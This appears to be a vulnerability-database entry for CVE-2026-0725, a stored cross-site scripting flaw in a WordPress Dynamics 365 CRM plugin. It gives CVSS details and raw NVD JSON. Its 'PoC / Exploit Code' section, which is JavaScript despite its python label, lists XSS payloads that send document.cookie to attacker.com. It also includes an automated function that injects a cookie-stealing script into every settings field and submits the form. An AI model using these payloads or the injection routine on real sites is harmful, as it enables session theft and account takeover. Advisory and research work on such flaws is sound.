Security Vulnerability Report
中文
CVE-2026-0725 CVSS 4.4 MEDIUM

CVE-2026-0725

Published: 2026-01-17 09:15:52
Last Modified: 2026-04-15 00:35:42

Description

The Integrate Dynamics 365 CRM plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Integrate Dynamics 365 CRM plugin for WordPress <= 1.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-0725 PoC - Stored XSS in Integrate Dynamics 365 CRM Plugin // Requires Administrator privileges // Steps to exploit: // 1. Navigate to WordPress Admin > Dynamics 365 CRM Settings // 2. Inject XSS payload in any settings field // 3. Save the settings // 4. Any user viewing affected pages will execute the injected script // Example XSS Payloads: const xssPayloads = [ '<script>alert(document.cookie)</script>', '<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>', '<svg onload=fetch("https://attacker.com/log?data="+btoa(document.cookie))>', '" onfocus="alert(1)" autofocus="', '<iframe src="javascript:alert(document.domain)">' ]; // Automated exploitation example: async function exploitStoredXSS() { const targetUrl = window.location.origin + '/wp-admin/admin.php?page=dynamics-365-settings'; const payload = '<script>new Image().src="https://attacker.com/cookie?c="+document.cookie</script>'; // Inject payload into settings field const settingsFields = document.querySelectorAll('input[type="text"], textarea'); settingsFields.forEach(field => { field.value = payload; }); // Submit the form document.querySelector('form').submit(); console.log('XSS payload injected successfully'); }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0725", "sourceIdentifier": "[email protected]", "published": "2026-01-17T09:15:52.027", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Integrate Dynamics 365 CRM plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}, {"lang": "es", "value": "El plugin Integrate Dynamics 365 CRM para WordPress es vulnerable a Cross-Site Scripting Almacenado a través de la configuración de administrador en todas las versiones hasta la 1.1.1, inclusive, debido a una sanitización de entrada y un escape de salida insuficientes en los atributos proporcionados por el usuario. Esto permite que atacantes autenticados, con acceso de nivel de Administrador y superior, inyecten scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/integrate-dynamics-365-crm/tags/1.1.1/Wrappers/class-templatewrapper.php#L491", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/integrate-dynamics-365-crm/trunk/Wrappers/class-templatewrapper.php#L491", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3438502/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6b16028a-0b69-422b-9471-32ea6edb93a0?source=cve", "source": "[email protected]"}]}}